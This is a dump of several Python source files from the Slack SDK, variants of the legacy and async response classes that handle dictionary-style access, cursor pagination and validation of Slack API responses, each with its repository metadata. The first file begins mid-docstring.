        validate: Check if the response from Slack was successful.
        get: Retrieves any key from the response data.
        next: Retrieves the next portion of results,
            if 'next_cursor' is present.

    Example:
    ```python
    import os
    import slack

    client = slack.WebClient(token=os.environ['SLACK_API_TOKEN'])

    response1 = client.auth_revoke(test='true')
    assert not response1['revoked']

    response2 = client.auth_test()
    assert response2.get('ok', False)

    users = []
    for page in client.users_list(limit=2):
        TODO: This example should specify when to break.
        users = users + page['members']
    ```

    Note:
        Some responses return collections of information
        like channel and user lists. If they do it's likely
        that you'll only receive a portion of results. This
        object allows you to iterate over the response which
        makes subsequent API requests until your code hits
        'break' or there are no more results to be found.

        Any attributes or methods prefixed with _underscores are
        intended to be "private" internal use only. They may be changed or
        removed at anytime.
    """

    def __init__(
        self,
        *,
        client,
        http_verb: str,
        api_url: str,
        req_args: dict,
        data: Union[dict, bytes],  # data can be binary data
        headers: dict,
        status_code: int,
        use_sync_aiohttp: bool = True,  # True for backward-compatibility
    ):
        """Store the raw HTTP exchange plus the client used for pagination."""
        self.http_verb = http_verb
        self.api_url = api_url
        self.req_args = req_args
        self.data = data
        self.headers = headers
        self.status_code = status_code
        # Kept so __iter__ can rewind to the first page after pagination
        # has overwritten self.data.
        self._initial_data = data
        self._client = client  # LegacyWebClient
        self._use_sync_aiohttp = use_sync_aiohttp
        self._logger = logging.getLogger(__name__)

    def __str__(self):
        """Return the Response data if object is converted to a string."""
        if isinstance(self.data, bytes):
            raise ValueError(
                "As the response.data is binary data, this operation is unsupported"
            )
        return f"{self.data}"

    def __getitem__(self, key):
        """Retrieves any key from the data store.

        Note:
            This is implemented so users can reference the
            SlackResponse object like a dictionary.
            e.g. response["ok"]

        Returns:
            The value from data or None.
        """
        if isinstance(self.data, bytes):
            raise ValueError(
                "As the response.data is binary data, this operation is unsupported"
            )
        return self.data.get(key, None)

    def __iter__(self):
        """Enables the ability to iterate over the response.

        It's required for the iterator protocol.

        Note:
            This enables Slack cursor-based pagination.

        Returns:
            (SlackResponse) self
        """
        if isinstance(self.data, bytes):
            raise ValueError(
                "As the response.data is binary data, this operation is unsupported"
            )
        # Rewind to the first page so the response can be iterated again.
        self._iteration = 0  # skipcq: PYL-W0201
        self.data = self._initial_data
        return self

    def __next__(self):
        """Retrieves the next portion of results, if 'next_cursor' is present.

        Note:
            Some responses return collections of information
            like channel and user lists. If they do it's likely
            that you'll only receive a portion of results. This
            method allows you to iterate over the response until
            your code hits 'break' or there are no more results
            to be found.

        Returns:
            (SlackResponse) self
                With the new response data now attached to this object.

        Raises:
            SlackApiError: If the request to the Slack API failed.
            StopIteration: If 'next_cursor' is not present or empty.
        """
        if isinstance(self.data, bytes):
            raise ValueError(
                "As the response.data is binary data, this operation is unsupported"
            )
        self._iteration += 1
        # The first iteration yields the page already held by this object;
        # only subsequent iterations issue follow-up requests.
        if self._iteration == 1:
            return self
        if self._next_cursor_is_present(self.data):  # skipcq: PYL-R1705
            params = self.req_args.get("params", {})
            if params is None:
                params = {}
            params.update({"cursor": self.data["response_metadata"]["next_cursor"]})
            self.req_args.update({"params": params})

            if self._use_sync_aiohttp:
                # We no longer recommend going with this way
                response = asyncio.get_event_loop().run_until_complete(
                    self._client._request(  # skipcq: PYL-W0212
                        http_verb=self.http_verb,
                        api_url=self.api_url,
                        req_args=self.req_args,
                    )
                )
            else:
                # This method sends a request in a synchronous way
                response = self._client._request_for_pagination(  # skipcq: PYL-W0212
                    api_url=self.api_url, req_args=self.req_args
                )
            self.data = response["data"]
            self.headers = response["headers"]
            self.status_code = response["status_code"]
            return self.validate()
        else:
            raise StopIteration

    def get(self, key, default=None):
        """Retrieves any key from the response data.

        Note:
            This is implemented so users can reference the
            SlackResponse object like a dictionary.
            e.g. response.get("ok", False)

        Returns:
            The value from data or the specified default.
        """
        if isinstance(self.data, bytes):
            raise ValueError(
                "As the response.data is binary data, this operation is unsupported"
            )
        return self.data.get(key, default)

    def validate(self):
        """Check if the response from Slack was successful.

        Returns:
            (SlackResponse)
                This method returns its own object. e.g. 'self'

        Raises:
            SlackApiError: The request to the Slack API failed.
        """
        if self._logger.level <= logging.DEBUG:
            body = self.data if isinstance(self.data, dict) else "(binary)"
            self._logger.debug(
                "Received the following response - "
                f"status: {self.status_code}, "
                f"headers: {dict(self.headers)}, "
                f"body: {body}"
            )
        # Binary payloads cannot carry an "ok" flag, so a 200 with bytes
        # content is treated as success.
        if (
            self.status_code == 200
            and self.data
            and (isinstance(self.data, bytes) or self.data.get("ok", False))
        ):
            return self
        msg = "The request to the Slack API failed."
        raise e.SlackApiError(message=msg, response=self)

    @staticmethod
    def _next_cursor_is_present(data):
        """Determine if the response contains 'next_cursor'
        and 'next_cursor' is not empty.

        Returns:
            A boolean value.
        """
        present = (
            "response_metadata" in data
            and "next_cursor" in data["response_metadata"]
            and data["response_metadata"]["next_cursor"] != ""
        )
        return present
| {
"repo_name": "slackhq/python-slackclient",
"path": "slack_sdk/web/legacy_slack_response.py",
"copies": "1",
"size": "7903",
"license": "mit",
"hash": 4732599416842040000,
"line_mean": 32.3459915612,
"line_max": 85,
"alpha_frac": 0.5685182842,
"autogenerated": false,
"ratio": 4.549798503166379,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.561831678736638,
"avg_score": null,
"num_lines": null
} |
"""A Python module for interacting and consuming responses from Slack."""
import asyncio
# Standard Imports
import logging
# Internal Imports
import slack_sdk.errors as e
class LegacySlackResponse(object): # skipcq: PYL-R0205
    """An iterable container of response data.
    Attributes:
        data (dict): The json-encoded content of the response. Along
            with the headers and status code information.
    Methods:
        validate: Check if the response from Slack was successful.
        get: Retrieves any key from the response data.
        next: Retrieves the next portion of results,
            if 'next_cursor' is present.
    Example:
    ```python
    import os
    import slack
    client = slack.WebClient(token=os.environ['SLACK_API_TOKEN'])
    response1 = client.auth_revoke(test='true')
    assert not response1['revoked']
    response2 = client.auth_test()
    assert response2.get('ok', False)
    users = []
    for page in client.users_list(limit=2):
        # TODO: This example should specify when to break.
        users = users + page['members']
    ```
    Note:
        Some responses return collections of information
        like channel and user lists. If they do it's likely
        that you'll only receive a portion of results. This
        object allows you to iterate over the response which
        makes subsequent API requests until your code hits
        'break' or there are no more results to be found.
        Any attributes or methods prefixed with _underscores are
        intended to be "private" internal use only. They may be changed or
        removed at anytime.
    """
    def __init__(
        self,
        *,
        client,
        http_verb: str,
        api_url: str,
        req_args: dict,
        data: dict,
        headers: dict,
        status_code: int,
        use_sync_aiohttp: bool = True,  # True for backward-compatibility
    ):
        self.http_verb = http_verb
        self.api_url = api_url
        self.req_args = req_args
        self.data = data
        self.headers = headers
        self.status_code = status_code
        # Snapshot of the first page so __iter__ can restart pagination.
        self._initial_data = data
        self._client = client  # LegacyWebClient
        self._use_sync_aiohttp = use_sync_aiohttp
        self._logger = logging.getLogger(__name__)
    def __str__(self):
        """Return the Response data if object is converted to a string."""
        return f"{self.data}"
    def __getitem__(self, key):
        """Retrieves any key from the data store.
        Note:
            This is implemented so users can reference the
            SlackResponse object like a dictionary.
            e.g. response["ok"]
        Returns:
            The value from data or None.
        """
        return self.data.get(key, None)
    def __iter__(self):
        """Enables the ability to iterate over the response.
        It's required for the iterator protocol.
        Note:
            This enables Slack cursor-based pagination.
        Returns:
            (SlackResponse) self
        """
        self._iteration = 0 # skipcq: PYL-W0201
        self.data = self._initial_data  # rewind to the first page
        return self
    def __next__(self):
        """Retrieves the next portion of results, if 'next_cursor' is present.
        Note:
            Some responses return collections of information
            like channel and user lists. If they do it's likely
            that you'll only receive a portion of results. This
            method allows you to iterate over the response until
            your code hits 'break' or there are no more results
            to be found.
        Returns:
            (SlackResponse) self
                With the new response data now attached to this object.
        Raises:
            SlackApiError: If the request to the Slack API failed.
            StopIteration: If 'next_cursor' is not present or empty.
        """
        self._iteration += 1
        # The first "next" yields the page already fetched by the client call.
        if self._iteration == 1:
            return self
        if self._next_cursor_is_present(self.data): # skipcq: PYL-R1705
            params = self.req_args.get("params", {})
            if params is None:
                params = {}
            params.update({"cursor": self.data["response_metadata"]["next_cursor"]})
            self.req_args.update({"params": params})
            if self._use_sync_aiohttp:
                # We no longer recommend going with this way
                # NOTE(review): run_until_complete cannot be used inside an
                # already-running event loop; presumably kept only for legacy
                # callers — confirm before reusing this path.
                response = asyncio.get_event_loop().run_until_complete(
                    self._client._request( # skipcq: PYL-W0212
                        http_verb=self.http_verb,
                        api_url=self.api_url,
                        req_args=self.req_args,
                    )
                )
            else:
                # This method sends a request in a synchronous way
                response = self._client._request_for_pagination( # skipcq: PYL-W0212
                    api_url=self.api_url, req_args=self.req_args
                )
            # Rebind this object to the freshly fetched page.
            self.data = response["data"]
            self.headers = response["headers"]
            self.status_code = response["status_code"]
            # Raises SlackApiError if the new page is not ok.
            return self.validate()
        else:
            raise StopIteration
    def get(self, key, default=None):
        """Retrieves any key from the response data.
        Note:
            This is implemented so users can reference the
            SlackResponse object like a dictionary.
            e.g. response.get("ok", False)
        Returns:
            The value from data or the specified default.
        """
        return self.data.get(key, default)
    def validate(self):
        """Check if the response from Slack was successful.
        Returns:
            (SlackResponse)
                This method returns its own object. e.g. 'self'
        Raises:
            SlackApiError: The request to the Slack API failed.
        """
        if self._logger.level <= logging.DEBUG:
            self._logger.debug(
                "Received the following response - "
                f"status: {self.status_code}, "
                f"headers: {dict(self.headers)}, "
                f"body: {self.data}"
            )
        if self.status_code == 200 and self.data and self.data.get("ok", False):
            return self
        msg = "The request to the Slack API failed."
        raise e.SlackApiError(message=msg, response=self)
    @staticmethod
    def _next_cursor_is_present(data):
        """Determine if the response contains 'next_cursor'
        and 'next_cursor' is not empty.
        Returns:
            A boolean value.
        """
        present = (
            "response_metadata" in data
            and "next_cursor" in data["response_metadata"]
            and data["response_metadata"]["next_cursor"] != ""
        )
        return present
| {
"repo_name": "slackapi/python-slackclient",
"path": "slack_sdk/web/legacy_slack_response.py",
"copies": "1",
"size": "6833",
"license": "mit",
"hash": -5970731061680909000,
"line_mean": 31.5380952381,
"line_max": 85,
"alpha_frac": 0.5709058978,
"autogenerated": false,
"ratio": 4.4747871643745905,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00017018234224496574,
"num_lines": 210
} |
"""A Python module for interacting and consuming responses from Slack."""
import logging
from typing import Union
import slack_sdk.errors as e
from .internal_utils import _next_cursor_is_present
class AsyncSlackResponse:
    """An iterable container of response data.
    Attributes:
        data (dict): The json-encoded content of the response. Along
            with the headers and status code information.
    Methods:
        validate: Check if the response from Slack was successful.
        get: Retrieves any key from the response data.
        next: Retrieves the next portion of results,
            if 'next_cursor' is present.
    Example:
    ```python
    import os
    import slack
    client = slack.AsyncWebClient(token=os.environ['SLACK_API_TOKEN'])
    response1 = await client.auth_revoke(test='true')
    assert not response1['revoked']
    response2 = await client.auth_test()
    assert response2.get('ok', False)
    users = []
    async for page in await client.users_list(limit=2):
        users = users + page['members']
    ```
    Note:
        Some responses return collections of information
        like channel and user lists. If they do it's likely
        that you'll only receive a portion of results. This
        object allows you to iterate over the response which
        makes subsequent API requests until your code hits
        'break' or there are no more results to be found.
        Any attributes or methods prefixed with _underscores are
        intended to be "private" internal use only. They may be changed or
        removed at anytime.
    """
    def __init__(
        self,
        *,
        client,  # AsyncWebClient
        http_verb: str,
        api_url: str,
        req_args: dict,
        data: Union[dict, bytes],  # data can be binary data
        headers: dict,
        status_code: int,
    ):
        self.http_verb = http_verb
        self.api_url = api_url
        self.req_args = req_args
        self.data = data
        self.headers = headers
        self.status_code = status_code
        # Snapshot of the first page so __aiter__ can restart pagination.
        self._initial_data = data
        self._iteration = None  # for __iter__ & __next__
        self._client = client
        self._logger = logging.getLogger(__name__)
    def __str__(self):
        """Return the Response data if object is converted to a string."""
        # Binary payloads (bytes) have no meaningful dict-style rendering.
        if isinstance(self.data, bytes):
            raise ValueError(
                "As the response.data is binary data, this operation is unsupported"
            )
        return f"{self.data}"
    def __getitem__(self, key):
        """Retrieves any key from the data store.
        Note:
            This is implemented so users can reference the
            SlackResponse object like a dictionary.
            e.g. response["ok"]
        Returns:
            The value from data or None.
        Raises:
            ValueError: If the payload is binary data.
        """
        if isinstance(self.data, bytes):
            raise ValueError(
                "As the response.data is binary data, this operation is unsupported"
            )
        return self.data.get(key, None)
    def __aiter__(self):
        """Enables the ability to iterate over the response.
        It's required async-for the iterator protocol.
        Note:
            This enables Slack cursor-based pagination.
        Returns:
            (AsyncSlackResponse) self
        Raises:
            ValueError: If the payload is binary data (not paginatable).
        """
        if isinstance(self.data, bytes):
            raise ValueError(
                "As the response.data is binary data, this operation is unsupported"
            )
        self._iteration = 0
        self.data = self._initial_data  # rewind to the first page
        return self
    async def __anext__(self):
        """Retrieves the next portion of results, if 'next_cursor' is present.
        Note:
            Some responses return collections of information
            like channel and user lists. If they do it's likely
            that you'll only receive a portion of results. This
            method allows you to iterate over the response until
            your code hits 'break' or there are no more results
            to be found.
        Returns:
            (AsyncSlackResponse) self
                With the new response data now attached to this object.
        Raises:
            SlackApiError: If the request to the Slack API failed.
            StopAsyncIteration: If 'next_cursor' is not present or empty.
        """
        if isinstance(self.data, bytes):
            raise ValueError(
                "As the response.data is binary data, this operation is unsupported"
            )
        self._iteration += 1
        # The first "next" yields the page already fetched by the client call.
        if self._iteration == 1:
            return self
        if _next_cursor_is_present(self.data): # skipcq: PYL-R1705
            params = self.req_args.get("params", {})
            if params is None:
                params = {}
            params.update({"cursor": self.data["response_metadata"]["next_cursor"]})
            self.req_args.update({"params": params})
            response = await self._client._request( # skipcq: PYL-W0212
                http_verb=self.http_verb,
                api_url=self.api_url,
                req_args=self.req_args,
            )
            # Rebind this object to the freshly fetched page.
            self.data = response["data"]
            self.headers = response["headers"]
            self.status_code = response["status_code"]
            # Raises SlackApiError if the new page is not ok.
            return self.validate()
        else:
            raise StopAsyncIteration
    def get(self, key, default=None):
        """Retrieves any key from the response data.
        Note:
            This is implemented so users can reference the
            SlackResponse object like a dictionary.
            e.g. response.get("ok", False)
        Returns:
            The value from data or the specified default.
        Raises:
            ValueError: If the payload is binary data.
        """
        if isinstance(self.data, bytes):
            raise ValueError(
                "As the response.data is binary data, this operation is unsupported"
            )
        return self.data.get(key, default)
    def validate(self):
        """Check if the response from Slack was successful.
        Returns:
            (AsyncSlackResponse)
                This method returns its own object. e.g. 'self'
        Raises:
            SlackApiError: The request to the Slack API failed.
        """
        if self._logger.level <= logging.DEBUG:
            body = self.data if isinstance(self.data, dict) else "(binary)"
            self._logger.debug(
                "Received the following response - "
                f"status: {self.status_code}, "
                f"headers: {dict(self.headers)}, "
                f"body: {body}"
            )
        # Binary payloads carry no "ok" field, so a 200 status alone counts
        # as success for them.
        if (
            self.status_code == 200
            and self.data
            and (isinstance(self.data, bytes) or self.data.get("ok", False))
        ):
            return self
        msg = "The request to the Slack API failed."
        raise e.SlackApiError(message=msg, response=self)
| {
"repo_name": "slackhq/python-slackclient",
"path": "slack_sdk/web/async_slack_response.py",
"copies": "1",
"size": "6889",
"license": "mit",
"hash": 3428470462824496000,
"line_mean": 32.2801932367,
"line_max": 84,
"alpha_frac": 0.5770068225,
"autogenerated": false,
"ratio": 4.562251655629139,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00034100596760443307,
"num_lines": 207
} |
"""A Python module for interacting and consuming responses from Slack."""
import logging
import slack.errors as e
from slack.web.internal_utils import _next_cursor_is_present
class AsyncSlackResponse:
    """An iterable container of response data.
    Attributes:
        data (dict): The json-encoded content of the response. Along
            with the headers and status code information.
    Methods:
        validate: Check if the response from Slack was successful.
        get: Retrieves any key from the response data.
        next: Retrieves the next portion of results,
            if 'next_cursor' is present.
    Example:
    ```python
    import os
    import slack
    client = slack.AsyncWebClient(token=os.environ['SLACK_API_TOKEN'])
    response1 = await client.auth_revoke(test='true')
    assert not response1['revoked']
    response2 = await client.auth_test()
    assert response2.get('ok', False)
    users = []
    async for page in await client.users_list(limit=2):
        users = users + page['members']
    ```
    Note:
        Some responses return collections of information
        like channel and user lists. If they do it's likely
        that you'll only receive a portion of results. This
        object allows you to iterate over the response which
        makes subsequent API requests until your code hits
        'break' or there are no more results to be found.
        Any attributes or methods prefixed with _underscores are
        intended to be "private" internal use only. They may be changed or
        removed at anytime.
    """
    def __init__(
        self,
        *,
        client,  # AsyncWebClient
        http_verb: str,
        api_url: str,
        req_args: dict,
        data: dict,
        headers: dict,
        status_code: int,
    ):
        self.http_verb = http_verb
        self.api_url = api_url
        self.req_args = req_args
        self.data = data
        self.headers = headers
        self.status_code = status_code
        # Snapshot of the first page so __aiter__ can restart pagination.
        self._initial_data = data
        self._iteration = None  # for __iter__ & __next__
        self._client = client
        self._logger = logging.getLogger(__name__)
    def __str__(self):
        """Return the Response data if object is converted to a string."""
        return f"{self.data}"
    def __getitem__(self, key):
        """Retrieves any key from the data store.
        Note:
            This is implemented so users can reference the
            SlackResponse object like a dictionary.
            e.g. response["ok"]
        Returns:
            The value from data or None.
        """
        return self.data.get(key, None)
    def __aiter__(self):
        """Enables the ability to iterate over the response.
        It's required async-for the iterator protocol.
        Note:
            This enables Slack cursor-based pagination.
        Returns:
            (AsyncSlackResponse) self
        """
        self._iteration = 0
        self.data = self._initial_data  # rewind to the first page
        return self
    async def __anext__(self):
        """Retrieves the next portion of results, if 'next_cursor' is present.
        Note:
            Some responses return collections of information
            like channel and user lists. If they do it's likely
            that you'll only receive a portion of results. This
            method allows you to iterate over the response until
            your code hits 'break' or there are no more results
            to be found.
        Returns:
            (AsyncSlackResponse) self
                With the new response data now attached to this object.
        Raises:
            SlackApiError: If the request to the Slack API failed.
            StopAsyncIteration: If 'next_cursor' is not present or empty.
        """
        self._iteration += 1
        # The first "next" yields the page already fetched by the client call.
        if self._iteration == 1:
            return self
        if _next_cursor_is_present(self.data): # skipcq: PYL-R1705
            params = self.req_args.get("params", {})
            if params is None:
                params = {}
            params.update({"cursor": self.data["response_metadata"]["next_cursor"]})
            self.req_args.update({"params": params})
            response = await self._client._request( # skipcq: PYL-W0212
                http_verb=self.http_verb,
                api_url=self.api_url,
                req_args=self.req_args,
            )
            # Rebind this object to the freshly fetched page.
            self.data = response["data"]
            self.headers = response["headers"]
            self.status_code = response["status_code"]
            # Raises SlackApiError if the new page is not ok.
            return self.validate()
        else:
            raise StopAsyncIteration
    def get(self, key, default=None):
        """Retrieves any key from the response data.
        Note:
            This is implemented so users can reference the
            SlackResponse object like a dictionary.
            e.g. response.get("ok", False)
        Returns:
            The value from data or the specified default.
        """
        return self.data.get(key, default)
    def validate(self):
        """Check if the response from Slack was successful.
        Returns:
            (AsyncSlackResponse)
                This method returns its own object. e.g. 'self'
        Raises:
            SlackApiError: The request to the Slack API failed.
        """
        if self._logger.level <= logging.DEBUG:
            self._logger.debug(
                "Received the following response - "
                f"status: {self.status_code}, "
                f"headers: {dict(self.headers)}, "
                f"body: {self.data}"
            )
        if self.status_code == 200 and self.data and self.data.get("ok", False):
            return self
        msg = "The request to the Slack API failed."
        raise e.SlackApiError(message=msg, response=self)
| {
"repo_name": "slackhq/python-slackclient",
"path": "slack/web/async_slack_response.py",
"copies": "1",
"size": "5825",
"license": "mit",
"hash": -4032822841874268000,
"line_mean": 31.182320442,
"line_max": 84,
"alpha_frac": 0.5816309013,
"autogenerated": false,
"ratio": 4.4738863287250386,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00013320654637955038,
"num_lines": 181
} |
"""A Python module for interacting and consuming responses from Slack."""
import logging
import slack_sdk.errors as e
from .internal_utils import _next_cursor_is_present
class AsyncSlackResponse:
    """An iterable container of response data.
    Attributes:
        data (dict): The json-encoded content of the response. Along
            with the headers and status code information.
    Methods:
        validate: Check if the response from Slack was successful.
        get: Retrieves any key from the response data.
        next: Retrieves the next portion of results,
            if 'next_cursor' is present.
    Example:
    ```python
    import os
    import slack
    client = slack.AsyncWebClient(token=os.environ['SLACK_API_TOKEN'])
    response1 = await client.auth_revoke(test='true')
    assert not response1['revoked']
    response2 = await client.auth_test()
    assert response2.get('ok', False)
    users = []
    async for page in await client.users_list(limit=2):
        users = users + page['members']
    ```
    Note:
        Some responses return collections of information
        like channel and user lists. If they do it's likely
        that you'll only receive a portion of results. This
        object allows you to iterate over the response which
        makes subsequent API requests until your code hits
        'break' or there are no more results to be found.
        Any attributes or methods prefixed with _underscores are
        intended to be "private" internal use only. They may be changed or
        removed at anytime.
    """
    def __init__(
        self,
        *,
        client,  # AsyncWebClient
        http_verb: str,
        api_url: str,
        req_args: dict,
        data: dict,
        headers: dict,
        status_code: int,
    ):
        self.http_verb = http_verb
        self.api_url = api_url
        self.req_args = req_args
        self.data = data
        self.headers = headers
        self.status_code = status_code
        # Snapshot of the first page so __aiter__ can restart pagination.
        self._initial_data = data
        self._iteration = None  # for __iter__ & __next__
        self._client = client
        self._logger = logging.getLogger(__name__)
    def __str__(self):
        """Return the Response data if object is converted to a string."""
        return f"{self.data}"
    def __getitem__(self, key):
        """Retrieves any key from the data store.
        Note:
            This is implemented so users can reference the
            SlackResponse object like a dictionary.
            e.g. response["ok"]
        Returns:
            The value from data or None.
        """
        return self.data.get(key, None)
    def __aiter__(self):
        """Enables the ability to iterate over the response.
        It's required async-for the iterator protocol.
        Note:
            This enables Slack cursor-based pagination.
        Returns:
            (AsyncSlackResponse) self
        """
        self._iteration = 0
        self.data = self._initial_data  # rewind to the first page
        return self
    async def __anext__(self):
        """Retrieves the next portion of results, if 'next_cursor' is present.
        Note:
            Some responses return collections of information
            like channel and user lists. If they do it's likely
            that you'll only receive a portion of results. This
            method allows you to iterate over the response until
            your code hits 'break' or there are no more results
            to be found.
        Returns:
            (AsyncSlackResponse) self
                With the new response data now attached to this object.
        Raises:
            SlackApiError: If the request to the Slack API failed.
            StopAsyncIteration: If 'next_cursor' is not present or empty.
        """
        self._iteration += 1
        # The first "next" yields the page already fetched by the client call.
        if self._iteration == 1:
            return self
        if _next_cursor_is_present(self.data): # skipcq: PYL-R1705
            params = self.req_args.get("params", {})
            if params is None:
                params = {}
            params.update({"cursor": self.data["response_metadata"]["next_cursor"]})
            self.req_args.update({"params": params})
            response = await self._client._request( # skipcq: PYL-W0212
                http_verb=self.http_verb, api_url=self.api_url, req_args=self.req_args,
            )
            # Rebind this object to the freshly fetched page.
            self.data = response["data"]
            self.headers = response["headers"]
            self.status_code = response["status_code"]
            # Raises SlackApiError if the new page is not ok.
            return self.validate()
        else:
            raise StopAsyncIteration
    def get(self, key, default=None):
        """Retrieves any key from the response data.
        Note:
            This is implemented so users can reference the
            SlackResponse object like a dictionary.
            e.g. response.get("ok", False)
        Returns:
            The value from data or the specified default.
        """
        return self.data.get(key, default)
    def validate(self):
        """Check if the response from Slack was successful.
        Returns:
            (AsyncSlackResponse)
                This method returns its own object. e.g. 'self'
        Raises:
            SlackApiError: The request to the Slack API failed.
        """
        if self._logger.level <= logging.DEBUG:
            self._logger.debug(
                "Received the following response - "
                f"status: {self.status_code}, "
                f"headers: {dict(self.headers)}, "
                f"body: {self.data}"
            )
        if self.status_code == 200 and self.data and self.data.get("ok", False):
            return self
        msg = "The request to the Slack API failed."
        raise e.SlackApiError(message=msg, response=self)
| {
"repo_name": "slackapi/python-slackclient",
"path": "slack_sdk/web/async_slack_response.py",
"copies": "1",
"size": "5788",
"license": "mit",
"hash": -2848151284887559000,
"line_mean": 31.3351955307,
"line_max": 87,
"alpha_frac": 0.5844851417,
"autogenerated": false,
"ratio": 4.455735180908391,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00019817888971136865,
"num_lines": 179
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.